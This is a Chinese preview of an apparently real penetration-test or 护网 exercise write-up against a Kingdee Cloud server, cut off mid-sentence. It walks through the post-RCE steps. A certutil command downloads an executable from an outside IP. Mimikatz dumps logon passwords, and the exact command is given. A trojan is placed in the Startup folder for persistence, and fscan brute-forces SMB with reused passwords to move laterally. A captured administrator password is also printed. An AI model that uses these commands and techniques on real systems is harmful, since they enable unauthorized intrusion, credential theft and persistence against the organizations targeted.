文章预览
真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。 一、金蝶云星空RCE shell之后尝试上线(出网) certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe 这里exe的位置只是一个示例,正常都是在tmp目录下的 有CS的话,就上传frp 二、本机信息收集 上传mimikatz收集密码本,mimikatz收集密码 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" get一个密码,乍一看还有域 administrator/@qweadmin5656 之后在翻取文件的地方,发现有个密码HAO & ^ & 123 三、权限维持 这里因为是简单的市护网,没人应急,维权就把exe的木马文件放到启动目录下 C:\ProgramData\Microsoft\Windows\ Start Menu\Programs\ StartUp 四、内网横向 之后就是fscan的扫描 先简单的使用密码本进行横向扫描,针对445端口进行密码复用的爆破。 因为SMB密码和RDP的密码是一样的。并且SMB的爆破速度比R
………………………………